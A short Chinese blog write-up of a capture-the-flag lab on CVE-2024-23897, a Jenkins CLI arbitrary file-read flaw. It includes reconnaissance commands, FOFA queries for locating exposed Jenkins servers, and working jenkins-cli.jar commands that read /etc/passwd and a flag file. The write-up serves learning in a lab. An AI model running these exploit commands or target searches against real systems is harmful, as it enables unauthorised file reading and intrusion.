CVE-2024-23897任意文件读取漏洞

2024-10-11

没事儿玩了玩i春秋的免费靶场,i春秋的会员有点贵,所以,就看了看免费的头一个看到的就是CVE-2024-23897

靶场介绍

jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中’@’字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件

待会儿搜一艘看看啥漏洞

打点

dirsearch 扫了扫:

dirsearch -u 8.147.132.32:19652

没啥有用的信息,扫到个robots.txt,么有啥价值的东西

1728653021962

nmap扫描(开放很多端口,之后再说)

nmap ip -Pn -A 

访问网站看看

1728653423667

抓包看看,之后试试爆破(弱口令试了试没用)

之后搜了搜CVE-2024-23897

可以看看这位大佬的漏洞复现

介绍

jenkins一个开源的、用于方便代码管理、部署的基于web的平台,用于提高团队开发效率(生产力)

影响版本

版本<= Jenkins 2.441、版本<= LTS 2.426.2

fofa语法

header=”X-Jenkins”   banner=”X-Jenkins”   header=”X-Hudson”   banner=”X-Hudson”   header=”X-Required-Permission: hudson.model.Hudson.Read”   banner=”X-Required-Permission: hudson.model.Hudson.Read”   body=”Jenkins-Agent-Protocols”

复现

下载http://url/jnlpJars/jenkins-cli.jar(刚才没有扫到(bushi))

java -jar jenkins-cli.jar -s http://8.147.132.32:19652 -http help 1 "@/etc/passwd"
java -jar jenkins-cli.jar -s http://8.147.132.32:19652 -http help 1 "@/flag" 

只能看到一部分不过flag能够看到

1728654427588

总结

我在想是不是这样做还不够,光获取flag还不够,还没有拿去到shell,还需要再努力